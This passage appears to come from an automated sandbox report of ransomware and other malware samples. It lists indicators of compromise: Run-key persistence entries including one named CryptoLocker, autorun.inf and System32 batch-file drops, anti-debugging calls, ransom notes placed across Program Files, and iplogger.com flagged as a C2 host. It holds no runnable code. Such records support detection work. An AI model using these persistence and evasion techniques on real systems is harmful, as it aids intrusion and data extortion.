Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe" C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\explorer.exe N/A
File opened (read-only) \??\E: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\E: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\E: C:\Windows\explorer.exe N/A
File opened (read-only) \??\E: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A

Drops autorun.inf file

Description Indicator Process Target
File created C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf C:\Windows\SysWOW64\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\Tsuchigumo.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\system32\Tsuchigumo.bat C:\Windows\system32\cmd.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jopt-simple.md C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_MAKC2R-ul-oob.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipssve.xml C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\LICENSE C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_es.properties C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Inset.eftx C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial2-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Retail-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwnumbered.dotx C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files (x86)\Common Files\System\wab32.dll-Locked C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\sk-SK\tipresx.dll.mui C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\Locales\ca.pak C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\tzdb.dat C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AuthoredExtensions.16.xml C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-pl.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalDemoR_BypassTrial180-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\thaidict.md C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\cursors.properties C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-oob.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp4-ul-oob.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Grace-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-pl.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-pl.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_F_COL.HXK C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\flavormap.properties C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
